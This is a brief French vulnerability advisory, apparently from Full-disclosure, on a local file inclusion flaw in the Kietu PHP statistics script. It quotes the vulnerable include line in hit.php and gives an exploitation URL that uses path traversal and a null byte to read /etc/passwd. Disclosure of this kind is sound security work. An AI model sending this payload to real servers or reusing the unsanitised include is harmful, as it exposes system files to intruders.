[Full-disclosure] Local File Inclusion : Kietu

2006-09-25T00:00:00
ID SECURITYVULNS:DOC:14408
Type securityvulns
Reporter Securityvulns
Modified 2006-09-25T00:00:00

Description

[::] Produit : Kietu

[::] Langage : PHP

[::] Description : Kietu? est un script ecrit en PHP, qui requiert une base de donnee mySQL, et qui vous permet de generer et consulter les statistiques d'acces a votre site web.

[::] Site web officiel : http://www.Kietu.net/

[::] Page vulnerable : hit.php

[::] Faille de securite : Local File Inclusion

[::] Code vulnerable : ( Ligne 2 ) -> include_once $url_hit.'class/kdetect.class.php';

[::] Exploitation : http://localhost/kietu/hit.php?url_hit=../../../../../etc/passwd%00

@ [::] Credit : Avis de securite par cdg393 -> cdg393_gmail_com :)